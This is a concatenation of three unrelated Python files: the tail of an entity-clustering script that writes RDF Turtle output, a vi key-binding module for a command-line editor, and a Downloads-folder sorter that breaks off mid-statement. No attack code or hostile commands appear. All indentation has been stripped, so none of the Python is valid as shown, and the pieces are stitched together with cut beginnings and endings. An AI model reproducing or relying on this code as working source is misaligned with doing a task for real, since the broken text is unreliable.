if ere_type[ODF_result[data[0]][int(data[1])]['label']] not in typeList:
continue
data2 = data[0].split('_')
arrayList[ere_type[ODF_result[data[0]][int(data[1])]['label']]].append(feature)
entityList[ere_type[ODF_result[data[0]][int(data[1])]['label']]].append(entity_dict[eid])
else:
data = key.split('/')
#print ere_type
if OD_result[data[0]][int(data[1])]['label'] not in ere_type.keys():
continue
if ere_type[OD_result[data[0]][int(data[1])]['label']] not in typeList:
continue
eid = "http://www.columbia.edu/AIDA/DVMM/Entities/ObjectDetection/RUN00010/JPG/"+key
#if eid in entity_dict.keys():
#continue
#bb_list.append(OD_result[data[0]][int(data[1])]['bbox'])
entityList[ere_type[str(OD_result[data[0]][int(data[1])]['label'])]].append(entity_dict[eid])
arrayList[ere_type[str(OD_result[data[0]][int(data[1])]['label'])]].append(feature)
matches = 0
for a, b in arrayList.items():
new_array = np.array(arrayList[a])
normed_matrix = normalize(new_array, axis=1, norm='l2')
normed_matrix_T = np.transpose(normed_matrix)
n_array = np.matmul(normed_matrix,normed_matrix_T )
db = DBSCAN(eps=0.3, min_samples=2, metric='cosine', n_jobs = 1).fit(new_array)
core_samples_mask = np.zeros_like(db.labels_, dtype=bool)
core_samples_mask[db.core_sample_indices_] = True
labels = db.labels_
n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
if len(new_array)>1:
clusterNameDic = {}
#print n_clusters_
firstMem = [0 for i in range(n_clusters_)]
for j in range(len(labels)):
if labels[j] == -1:
continue
matches+=1
#print j
#print labels[j]
score = 1
#print firstMem
if firstMem[labels[j]] == 0:
firstMem[labels[j]] = 1
clusterNameDic[labels[j]] = aifutils.make_cluster_with_prototype(g, "http://www.columbia.edu/AIDA/DVMM/Clusters/ObjectCoreference/RUN00010/"+ a+'/'+str(labels[j]),entityList[a][j], sys_instance_matching)
#print entityList[a][j]
else:
aifutils.mark_as_possible_cluster_member(g, entityList[a][j],clusterNameDic[labels[j]], score, sys_instance_matching)
#print entityList[a][j]
#dataName = 'post_e_i_c'
#parent = x
with open(dataName+'/'+x+'.ttl', 'w') as fout:
serialization = BytesIO()
# need .buffer because serialize will write bytes, not str
g.serialize(destination=serialization, format='turtle')
fout.write(serialization.getvalue().decode('utf-8'))
end = time.time()
print(end - start)
|
from __future__ import unicode_literals
from ..enums import IncrementalSearchDirection, InputMode
from ..keys import Keys
from ..line import ClipboardData, ClipboardDataType, SelectionType, indent, unindent
from ..selection import SelectionType
from .basic import basic_bindings
from .utils import create_handle_decorator
import codecs
__all__ = (
'vi_bindings',
)
class CursorRegion(object):
"""
Return struct for functions wrapped in ``change_delete_move_yank_handler``.
"""
def __init__(self, start, end=0):
self.start = start
self.end = end
def sorted(self):
"""
Return a (start, end) tuple where start <= end.
"""
if self.start < self.end:
return self.start, self.end
else:
return self.end, self.start
def vi_bindings(registry, cli_ref):
"""
Vi extensions.
# Overview of Readline Vi commands:
# http://www.catonmat.net/download/bash-vi-editing-mode-cheat-sheet.pdf
"""
basic_bindings(registry, cli_ref)
line = cli_ref().line
search_line = cli_ref().lines['search']
handle = create_handle_decorator(registry, line)
_last_character_find = [None] # (char, backwards) tuple
_search_direction = [IncrementalSearchDirection.FORWARD]
vi_transform_functions = [
# Rot 13 transformation
(('g', '?'), lambda string: codecs.encode(string, 'rot_13')),
# To lowercase
(('g', 'u'), lambda string: string.lower()),
# To uppercase.
(('g', 'U'), lambda string: string.upper()),
# Swap case.
# (XXX: If we would implement 'tildeop', the 'g' prefix is not required.)
(('g', '~'), lambda string: string.swapcase()),
]
@registry.add_after_handler_callback
def check_cursor_position(event):
"""
After every command, make sure that if we are in navigation mode, we
never put the cursor after the last character of a line. (Unless it's
an empty line.)
"""
if (
event.input_processor.input_mode == InputMode.VI_NAVIGATION and
line.document.is_cursor_at_the_end_of_line and
len(line.document.current_line) > 0):
line.cursor_position -= 1
@handle(Keys.Escape)
def _(event):
"""
Escape goes to vi navigation mode.
"""
if event.input_processor.input_mode == InputMode.SELECTION:
line.exit_selection()
event.input_processor.pop_input_mode()
else:
event.input_processor.input_mode = InputMode.VI_NAVIGATION
@handle(Keys.Up, in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Arrow up in navigation mode.
"""
line.auto_up(count=event.arg)
@handle(Keys.Down, in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Arrow down in navigation mode.
"""
line.auto_down(count=event.arg)
@handle(Keys.Backspace, in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
In navigation-mode, move cursor.
"""
line.cursor_position += line.document.get_cursor_left_position(count=event.arg)
@handle(Keys.ControlV, Keys.Any, in_mode=InputMode.INSERT)
def _(event):
"""
Insert a character literally (quoted insert).
"""
line.insert_text(event.data, overwrite=False)
@handle(Keys.ControlN, in_mode=InputMode.INSERT)
def _(event):
line.complete_next()
@handle(Keys.ControlN, in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Control-N: Next completion.
"""
line.auto_down()
@handle(Keys.ControlP, in_mode=InputMode.INSERT)
def _(event):
"""
Control-P: To previous completion.
"""
line.complete_previous()
@handle(Keys.ControlY, in_mode=InputMode.INSERT)
def _(event):
"""
Accept current completion.
"""
line.complete_state = None
@handle(Keys.ControlE, in_mode=InputMode.INSERT)
def _(event):
"""
Cancel completion. Go back to originally typed text.
"""
line.cancel_completion()
@handle(Keys.ControlP, in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
CtrlP in navigation mode goes up.
"""
line.auto_up()
@handle(Keys.ControlJ, in_mode=InputMode.VI_NAVIGATION)
@handle(Keys.ControlM, in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
In navigation mode, pressing enter will always return the input.
"""
if line.validate():
line.add_to_history()
cli_ref().set_return_value(line.document)
# ** In navigation mode **
# List of navigation commands: http://hea-www.harvard.edu/~fine/Tech/vi.html
@handle('a', in_mode=InputMode.VI_NAVIGATION)
def _(event):
line.cursor_position += line.document.get_cursor_right_position()
event.input_processor.input_mode = InputMode.INSERT
@handle('A', in_mode=InputMode.VI_NAVIGATION)
def _(event):
line.cursor_position += line.document.get_end_of_line_position()
event.input_processor.input_mode = InputMode.INSERT
@handle('C', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
# Change to end of line.
# Same as 'c$' (which is implemented elsewhere.)
"""
deleted = line.delete(count=line.document.get_end_of_line_position())
if deleted:
data = ClipboardData(deleted)
line.set_clipboard(data)
event.input_processor.input_mode = InputMode.INSERT
@handle('c', 'c', in_mode=InputMode.VI_NAVIGATION)
@handle('S', in_mode=InputMode.VI_NAVIGATION)
def _(event): # TODO: implement 'arg'
"""
Change current line
"""
# We copy the whole line.
data = ClipboardData(line.document.current_line, ClipboardDataType.LINES)
line.set_clipboard(data)
# But we delete after the whitespace
line.cursor_position += line.document.get_start_of_line_position(after_whitespace=True)
line.delete(count=line.document.get_end_of_line_position())
event.input_processor.input_mode = InputMode.INSERT
@handle('D', in_mode=InputMode.VI_NAVIGATION)
def _(event):
deleted = line.delete(count=line.document.get_end_of_line_position())
line.set_clipboard(ClipboardData(deleted))
@handle('d', 'd', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Delete line. (Or the following 'n' lines.)
"""
# Split string in before/deleted/after text.
lines = line.document.lines
before = '\n'.join(lines[:line.document.cursor_position_row])
deleted = '\n'.join(lines[line.document.cursor_position_row: line.document.cursor_position_row + event.arg])
after = '\n'.join(lines[line.document.cursor_position_row + event.arg:])
# Set new text.
if before and after:
before = before + '\n'
line.text = before + after
# Set cursor position. (At the start of the first 'after' line, after the leading whitespace.)
line.cursor_position = len(before) + len(after) - len(after.lstrip(' '))
# Set clipboard data
line.set_clipboard(ClipboardData(deleted, ClipboardDataType.LINES))
@handle('G', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
If an argument is given, move to this line in the history. (for
example, 15G) Otherwise, go the the last line of the current string.
"""
# If an arg has been given explicitely.
if event._arg:
line.go_to_history(event.arg - 1)
# Otherwise this goes to the last line of the file.
else:
line.cursor_position = len(line.text)
@handle('i', in_mode=InputMode.VI_NAVIGATION)
def _(event):
event.input_processor.input_mode = InputMode.INSERT
@handle('I', in_mode=InputMode.VI_NAVIGATION)
def _(event):
event.input_processor.input_mode = InputMode.INSERT
line.cursor_position += line.document.get_start_of_line_position(after_whitespace=True)
@handle('J', in_mode=InputMode.VI_NAVIGATION)
def _(event):
for i in range(event.arg):
line.join_next_line()
@handle('n', in_mode=InputMode.VI_NAVIGATION)
def _(event): # XXX: use `change_delete_move_yank_handler` and implement 'arg'
"""
Search next.
"""
line.incremental_search(_search_direction[0])
@handle('N', in_mode=InputMode.VI_NAVIGATION)
def _(event): # TODO: use `change_delete_move_yank_handler` and implement 'arg'
"""
Search previous.
"""
if _search_direction[0] == IncrementalSearchDirection.BACKWARD:
line.incremental_search(IncrementalSearchDirection.FORWARD)
else:
line.incremental_search(IncrementalSearchDirection.BACKWARD)
@handle('p', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Paste after
"""
for i in range(event.arg):
line.paste_from_clipboard()
@handle('P', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Paste before
"""
for i in range(event.arg):
line.paste_from_clipboard(before=True)
@handle('r', Keys.Any, in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Replace single character under cursor
"""
line.insert_text(event.data * event.arg, overwrite=True)
@handle('R', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Go to 'replace'-mode.
"""
event.input_processor.input_mode = InputMode.VI_REPLACE
@handle('s', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Substitute with new text
(Delete character(s) and go to insert mode.)
"""
data = ClipboardData(''.join(line.delete() for i in range(event.arg)))
line.set_clipboard(data)
event.input_processor.input_mode = InputMode.INSERT
@handle('u', in_mode=InputMode.VI_NAVIGATION)
def _(event):
for i in range(event.arg):
line.undo()
@handle('v', in_mode=InputMode.VI_NAVIGATION)
def _(event):
line.open_in_editor()
# @handle('v', in_mode=InputMode.VI_NAVIGATION)
# def _(event):
# """
# Start characters selection.
# """
# line.start_selection(selection_type=SelectionType.CHARACTERS)
# event.input_processor.push_input_mode(InputMode.SELECTION)
@handle('V', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Start lines selection.
"""
line.start_selection(selection_type=SelectionType.LINES)
event.input_processor.push_input_mode(InputMode.SELECTION)
@handle('x', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Delete character.
"""
data = ClipboardData(line.delete(count=event.arg))
line.set_clipboard(data)
@handle('x', in_mode=InputMode.SELECTION)
@handle('d', 'd', in_mode=InputMode.SELECTION)
def _(event):
"""
Cut selection.
"""
selection_type = line.selection_state.type
deleted = line.cut_selection()
line.set_clipboard(ClipboardData(deleted, selection_type))
event.input_processor.pop_input_mode()
@handle('c', in_mode=InputMode.SELECTION)
def _(event):
"""
Change selection (cut and go to insert mode).
"""
selection_type = line.selection_state.type
deleted = line.cut_selection()
line.set_clipboard(ClipboardData(deleted, selection_type))
event.input_processor.pop_input_mode()
event.input_processor.input_mode = InputMode.INSERT
@handle('y', in_mode=InputMode.SELECTION)
def _(event):
"""
Copy selection.
"""
selection_type = line.selection_state.type
deleted = line.copy_selection()
line.set_clipboard(ClipboardData(deleted, selection_type))
event.input_processor.pop_input_mode()
@handle('X', in_mode=InputMode.VI_NAVIGATION)
def _(event):
data = line.delete_before_cursor()
line.set_clipboard(data)
@handle('y', 'y', in_mode=InputMode.VI_NAVIGATION)
@handle('Y', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Yank the whole line.
"""
text = '\n'.join(line.document.lines_from_current[:event.arg])
data = ClipboardData(text, ClipboardDataType.LINES)
line.set_clipboard(data)
@handle('+', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Move to first non whitespace of next line
"""
line.cursor_position += line.document.get_cursor_down_position(count=event.arg)
line.cursor_position += line.document.get_start_of_line_position(after_whitespace=True)
@handle('-', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Move to first non whitespace of previous line
"""
line.cursor_position += line.document.get_cursor_up_position(count=event.arg)
line.cursor_position += line.document.get_start_of_line_position(after_whitespace=True)
@handle('>', '>', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Indent lines.
"""
current_row = line.document.cursor_position_row
indent(line, current_row, current_row + event.arg)
@handle('<', '<', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Unindent lines.
"""
current_row = line.document.cursor_position_row
unindent(line, current_row, current_row + event.arg)
@handle('>', in_mode=InputMode.SELECTION)
def _(event):
"""
Indent selection
"""
selection_type = line.selection_state.type
if selection_type == SelectionType.LINES:
from_, to = line.document.selection_range()
from_, _ = line.document.translate_index_to_position(from_)
to, _ = line.document.translate_index_to_position(to)
indent(line, from_ - 1, to, count=event.arg) # XXX: why does translate_index_to_position return 1-based indexing???
event.input_processor.pop_input_mode()
@handle('<', in_mode=InputMode.SELECTION)
def _(event):
"""
Unindent selection
"""
selection_type = line.selection_state.type
if selection_type == SelectionType.LINES:
from_, to = line.document.selection_range()
from_, _ = line.document.translate_index_to_position(from_)
to, _ = line.document.translate_index_to_position(to)
unindent(line, from_ - 1, to, count=event.arg)
event.input_processor.pop_input_mode()
@handle('O', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Open line above and enter insertion mode
"""
line.insert_line_above()
event.input_processor.input_mode = InputMode.INSERT
@handle('o', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Open line below and enter insertion mode
"""
line.insert_line_below()
event.input_processor.input_mode = InputMode.INSERT
@handle('~', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Reverse case of current character and move cursor forward.
"""
c = line.document.current_char
if c is not None and c != '\n':
c = (c.upper() if c.islower() else c.lower())
line.insert_text(c, overwrite=True)
@handle('/', in_mode=InputMode.VI_NAVIGATION)
@handle(Keys.ControlS, in_mode=InputMode.INSERT)
@handle(Keys.ControlS, in_mode=InputMode.VI_NAVIGATION)
@handle(Keys.ControlS, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Vi-style forward search.
"""
_search_direction[0] = direction = IncrementalSearchDirection.FORWARD
line.incremental_search(direction)
if event.input_processor.input_mode != InputMode.VI_SEARCH:
event.input_processor.push_input_mode(InputMode.VI_SEARCH)
@handle('?', in_mode=InputMode.VI_NAVIGATION)
@handle(Keys.ControlR, in_mode=InputMode.INSERT)
@handle(Keys.ControlR, in_mode=InputMode.VI_NAVIGATION)
@handle(Keys.ControlR, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Vi-style backward search.
"""
_search_direction[0] = direction = IncrementalSearchDirection.BACKWARD
line.incremental_search(direction)
if event.input_processor.input_mode != InputMode.VI_SEARCH:
event.input_processor.push_input_mode(InputMode.VI_SEARCH)
@handle('#', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Go to previous occurence of this word.
"""
pass
@handle('*', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Go to next occurence of this word.
"""
pass
@handle('(', in_mode=InputMode.VI_NAVIGATION)
def _(event):
# TODO: go to begin of sentence.
pass
@handle(')', in_mode=InputMode.VI_NAVIGATION)
def _(event):
# TODO: go to end of sentence.
pass
def change_delete_move_yank_handler(*keys, **kw):
"""
Register a change/delete/move/yank handlers. e.g. 'dw'/'cw'/'w'/'yw'
The decorated function should return a ``CursorRegion``.
This decorator will create both the 'change', 'delete' and move variants,
based on that ``CursorRegion``.
"""
no_move_handler = kw.pop('no_move_handler', False)
# TODO: Also do '>' and '<' indent/unindent operators.
# TODO: Also "gq": text formatting
# See: :help motion.txt
def decorator(func):
if not no_move_handler:
@handle(*keys, in_mode=InputMode.VI_NAVIGATION)
@handle(*keys, in_mode=InputMode.SELECTION)
def move(event):
""" Create move handler. """
region = func(event)
line.cursor_position += region.start
def create_transform_handler(transform_func, *a):
@handle(*(a + keys), in_mode=InputMode.VI_NAVIGATION)
def _(event):
""" Apply transformation (uppercase, lowercase, rot13, swap case). """
region = func(event)
start, end = region.sorted()
# Transform.
line.transform_region(
line.cursor_position + start,
line.cursor_position + end,
transform_func)
# Move cursor
line.cursor_position += (region.end or region.start)
for k, f in vi_transform_functions:
create_transform_handler(f, *k)
@handle('y', *keys, in_mode=InputMode.VI_NAVIGATION)
def yank_handler(event):
""" Create yank handler. """
region = func(event)
start, end = region.sorted()
substring = line.text[line.cursor_position + start: line.cursor_position + end]
if substring:
line.set_clipboard(ClipboardData(substring))
def create(delete_only):
""" Create delete and change handlers. """
@handle('cd'[delete_only], *keys, in_mode=InputMode.VI_NAVIGATION)
@handle('cd'[delete_only], *keys, in_mode=InputMode.VI_NAVIGATION)
def _(event):
region = func(event)
deleted = ''
if region:
start, end = region.sorted()
# Move to the start of the region.
line.cursor_position += start
# Delete until end of region.
deleted = line.delete(count=end-start)
# Set deleted/changed text to clipboard.
if deleted:
line.set_clipboard(ClipboardData(''.join(deleted)))
# Only go back to insert mode in case of 'change'.
if not delete_only:
event.input_processor.input_mode = InputMode.INSERT
create(True)
create(False)
return func
return decorator
@change_delete_move_yank_handler('b') # Move one word or token left.
@change_delete_move_yank_handler('B') # Move one non-blank word left ((# TODO: difference between 'b' and 'B')
def key_b(event):
return CursorRegion(line.document.find_start_of_previous_word(count=event.arg) or 0)
@change_delete_move_yank_handler('$')
def key_dollar(event):
""" 'c$', 'd$' and '$': Delete/change/move until end of line. """
return CursorRegion(line.document.get_end_of_line_position())
@change_delete_move_yank_handler('w') # TODO: difference between 'w' and 'W'
def key_w(event):
""" 'cw', 'de', 'w': Delete/change/move one word. """
return CursorRegion(line.document.find_next_word_beginning(count=event.arg) or 0)
@change_delete_move_yank_handler('e') # TODO: difference between 'e' and 'E'
def key_e(event):
""" 'ce', 'de', 'e' """
end = line.document.find_next_word_ending(count=event.arg)
return CursorRegion(end - 1 if end else 0)
@change_delete_move_yank_handler('i', 'w', no_move_handler=True)
def key_iw(event):
""" ciw and diw """
# Change inner word: change word under cursor.
start, end = line.document.find_boundaries_of_current_word()
return CursorRegion(start, end)
@change_delete_move_yank_handler('^')
def key_circumflex(event):
""" 'c^', 'd^' and '^': Soft start of line, after whitespace. """
return CursorRegion(line.document.get_start_of_line_position(after_whitespace=True))
@change_delete_move_yank_handler('0', no_move_handler=True)
def key_zero(event):
"""
'c0', 'd0': Hard start of line, before whitespace.
(The move '0' key is implemented elsewhere, because a '0' could also change the `arg`.)
"""
return CursorRegion(line.document.get_start_of_line_position(after_whitespace=False))
def create_ci_ca_handles(ci_start, ci_end, inner):
# TODO: 'dab', 'dib', (brackets or block) 'daB', 'diB', Braces.
# TODO: 'dat', 'dit', (tags (like xml)
"""
Delete/Change string between this start and stop character. But keep these characters.
This implements all the ci", ci<, ci{, ci(, di", di<, ca", ca<, ... combinations.
"""
@change_delete_move_yank_handler('ai'[inner], ci_start, no_move_handler=True)
@change_delete_move_yank_handler('ai'[inner], ci_end, no_move_handler=True)
def _(event):
start = line.document.find_backwards(ci_start, in_current_line=True)
end = line.document.find(ci_end, in_current_line=True)
if start is not None and end is not None:
offset = 0 if inner else 1
return CursorRegion(start + 1 - offset, end + offset)
for inner in (False, True):
for ci_start, ci_end in [('"', '"'), ("'", "'"), ("`", "`"),
('[', ']'), ('<', '>'), ('{', '}'), ('(', ')')]:
create_ci_ca_handles(ci_start, ci_end, inner)
@change_delete_move_yank_handler('{') # TODO: implement 'arg'
def _(event):
"""
Move to previous blank-line separated section.
Implements '{', 'c{', 'd{', 'y{'
"""
line_index = line.document.find_previous_matching_line(
lambda text: not text or text.isspace())
if line_index:
index = line.document.get_cursor_up_position(count=-line_index)
else:
index = 0
return CursorRegion(index)
@change_delete_move_yank_handler('}') # TODO: implement 'arg'
def _(event):
"""
Move to next blank-line separated section.
Implements '}', 'c}', 'd}', 'y}'
"""
line_index = line.document.find_next_matching_line(
lambda text: not text or text.isspace())
if line_index:
index = line.document.get_cursor_down_position(count=line_index)
else:
index = 0
return CursorRegion(index)
@change_delete_move_yank_handler('f', Keys.Any)
def _(event):
"""
Go to next occurance of character. Typing 'fx' will move the
cursor to the next occurance of character. 'x'.
"""
_last_character_find[0] = (event.data, False)
match = line.document.find(event.data, in_current_line=True, count=event.arg)
return CursorRegion(match or 0)
@change_delete_move_yank_handler('F', Keys.Any)
def _(event):
"""
Go to previous occurance of character. Typing 'Fx' will move the
cursor to the previous occurance of character. 'x'.
"""
_last_character_find[0] = (event.data, True)
return CursorRegion(line.document.find_backwards(event.data, in_current_line=True, count=event.arg) or 0)
@change_delete_move_yank_handler('t', Keys.Any)
def _(event):
"""
Move right to the next occurance of c, then one char backward.
"""
_last_character_find[0] = (event.data, False)
match = line.document.find(event.data, in_current_line=True, count=event.arg)
return CursorRegion(match - 1 if match else 0)
@change_delete_move_yank_handler('T', Keys.Any)
def _(event):
"""
Move left to the previous occurance of c, then one char forward.
"""
_last_character_find[0] = (event.data, True)
match = line.document.find_backwards(event.data, in_current_line=True, count=event.arg)
return CursorRegion(match + 1 if match else 0)
def repeat(reverse):
"""
Create ',' and ';' commands.
"""
@change_delete_move_yank_handler(',' if reverse else ';')
def _(event):
# Repeat the last 'f'/'F'/'t'/'T' command.
pos = 0
if _last_character_find[0]:
char, backwards = _last_character_find[0]
if reverse:
backwards = not backwards
if backwards:
pos = line.document.find_backwards(char, in_current_line=True, count=event.arg)
else:
pos = line.document.find(char, in_current_line=True, count=event.arg)
return CursorRegion(pos or 0)
repeat(True)
repeat(False)
@change_delete_move_yank_handler('h')
@change_delete_move_yank_handler(Keys.Left)
def _(event):
""" Implements 'ch', 'dh', 'h': Cursor left. """
return CursorRegion(line.document.get_cursor_left_position(count=event.arg))
@change_delete_move_yank_handler('j')
def _(event):
""" Implements 'cj', 'dj', 'j', ... Cursor up. """
return CursorRegion(line.document.get_cursor_down_position(count=event.arg))
@change_delete_move_yank_handler('k')
def _(event):
""" Implements 'ck', 'dk', 'k', ... Cursor up. """
return CursorRegion(line.document.get_cursor_up_position(count=event.arg))
@change_delete_move_yank_handler('l')
@change_delete_move_yank_handler(' ')
@change_delete_move_yank_handler(Keys.Right)
def _(event):
""" Implements 'cl', 'dl', 'l', 'c ', 'd ', ' '. Cursor right. """
return CursorRegion(line.document.get_cursor_right_position(count=event.arg))
@change_delete_move_yank_handler('H')
def _(event):
""" Implements 'cH', 'dH', 'H'. """
# Vi moves to the start of the visible region.
# cursor position 0 is okay for us.
return CursorRegion(-len(line.document.text_before_cursor))
@change_delete_move_yank_handler('L')
def _(event):
# Vi moves to the end of the visible region.
# cursor position 0 is okay for us.
return CursorRegion(len(line.document.text_after_cursor))
@change_delete_move_yank_handler('%')
def _(event):
"""
Implements 'c%', 'd%', '%, 'y%' (Move to corresponding bracket.)
If an 'arg' has been given, go this this % position in the file.
"""
if event._arg:
# If 'arg' has been given, the meaning of % is to go to the 'x%'
# row in the file.
if 0 < event.arg <= 100:
absolute_index = line.document.translate_row_col_to_index(
int(event.arg * line.document.line_count / 100), 0)
return CursorRegion(absolute_index - line.document.cursor_position)
else:
return CursorRegion(0) # Do nothing.
else:
# Move to the corresponding opening/closing bracket (()'s, []'s and {}'s).
return CursorRegion(line.document.matching_bracket_position)
@change_delete_move_yank_handler('|')
def _(event):
# Move to the n-th column (you may specify the argument n by typing
# it on number keys, for example, 20|).
return CursorRegion(line.document.get_column_cursor_position(event.arg))
@change_delete_move_yank_handler('g', 'g')
def _(event):
"""
Implements 'gg', 'cgg', 'ygg'
"""
# Move to the top of the input.
return CursorRegion(line.document.home_position)
@handle('!', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
'!' opens the system prompt.
"""
event.input_processor.push_input_mode(InputMode.SYSTEM)
@handle(Keys.Any, in_mode=InputMode.VI_NAVIGATION)
@handle(Keys.Any, in_mode=InputMode.SELECTION)
def _(event):
"""
Always handle numberics in navigation mode as arg.
"""
if event.data in '123456789' or (event._arg and event.data == '0'):
event.append_to_arg_count(event.data)
elif event.data == '0':
line.cursor_position += line.document.get_start_of_line_position(after_whitespace=False)
@handle(Keys.Any, in_mode=InputMode.VI_REPLACE)
def _(event):
"""
Insert data at cursor position.
"""
line.insert_text(event.data, overwrite=True)
@handle(Keys.Any, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Insert text after the / or ? prompt.
"""
search_line.insert_text(event.data)
line.set_search_text(search_line.text)
@handle(Keys.ControlJ, in_mode=InputMode.VI_SEARCH)
@handle(Keys.ControlM, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Enter at the / or ? prompt.
"""
# Add query to history of searh line.
search_line.add_to_history()
search_line.reset()
# Go back to navigation mode.
event.input_processor.pop_input_mode()
@handle(Keys.Backspace, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Backspace at the vi-search prompt.
"""
if search_line.text:
search_line.delete_before_cursor()
line.set_search_text(search_line.text)
else:
# If no text after the prompt, cancel search.
line.exit_isearch(restore_original_line=True)
search_line.reset()
event.input_processor.pop_input_mode()
@handle(Keys.Up, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Go to the previous history item at the search prompt.
"""
search_line.auto_up()
line.set_search_text(search_line.text)
@handle(Keys.Down, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Go to the next history item at the search prompt.
"""
search_line.auto_down()
search_line.cursor_position = len(search_line.text)
line.set_search_text(search_line.text)
@handle(Keys.Left, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Arrow left at the search prompt.
"""
search_line.cursor_left()
@handle(Keys.Right, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Arrow right at the search prompt.
"""
search_line.cursor_right()
@handle(Keys.ControlC, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Cancel search.
"""
line.exit_isearch(restore_original_line=True)
search_line.reset()
event.input_processor.pop_input_mode()
def create_selection_transform_handler(keys, transform_func):
"""
Apply transformation on selection (uppercase, lowercase, rot13, swap case).
"""
@handle(*keys, in_mode=InputMode.SELECTION)
def _(event):
range = line.document.selection_range()
if range:
line.transform_region(range[0], range[1], transform_func)
event.input_processor.pop_input_mode()
for k, f in vi_transform_functions:
create_selection_transform_handler(k, f)
@handle(Keys.ControlX, Keys.ControlL, in_mode=InputMode.INSERT)
def _(event):
"""
Pressing the ControlX - ControlL sequence in Vi mode does line
completion based on the other lines in the document and the history.
"""
line.start_history_lines_completion()
@handle(Keys.ControlX, Keys.ControlF, in_mode=InputMode.INSERT)
def _(event):
"""
Complete file names.
"""
# TODO
pass
|
# [warning: do not run this script in the partiiton where system files are stored]
# use it with caution
import os
import shutil
path = '/home/hafeez/Downloads/'
names = os.listdir(path)
folder_name = ['Images', 'Audio', 'Videos', 'Documents', 'Softwares','System']
for x in range(0,6):
if not os.path.exists(path+folder_name[x]):
os.makedirs(path+folder_name[x])
for (main_dir,sub_dir,file_in_sub_dir) in os.walk(path):
print(main_dir)
for files in file_in_sub_dir:
#Images
if ".svg" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".jpg" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".jpeg" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".bmp" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".png" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".gif" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".tiff" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".psd" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
if ".raw" in files and not os.path.exists(path+'Images/'+files):
shutil.move(main_dir+'/'+files, path+'Images/'+files)
#Audio / Music
if ".mp3" in files and not os.path.exists(path+'Audio/'+files):
shutil.move(main_dir+'/'+files, path+'Audio/'+files)
if ".m4a" in files and not os.path.exists(path+'Audio/'+files):
shutil.move(main_dir+'/'+files, path+'Audio/'+files)
if ".wav" in files and not os.path.exists(path+'Audio/'+files):
shutil.move(main_dir+'/'+files, path+'Audio/'+files)
# Video / Movies
if ".mp4" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mkv" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".webm" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mpg" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mp2" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mpeg" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mpe" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mpv" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".ogg" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".m4v" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".m4p" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".avi" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".wmv" in files and not os.path.exists(path+'Videos/'+files):
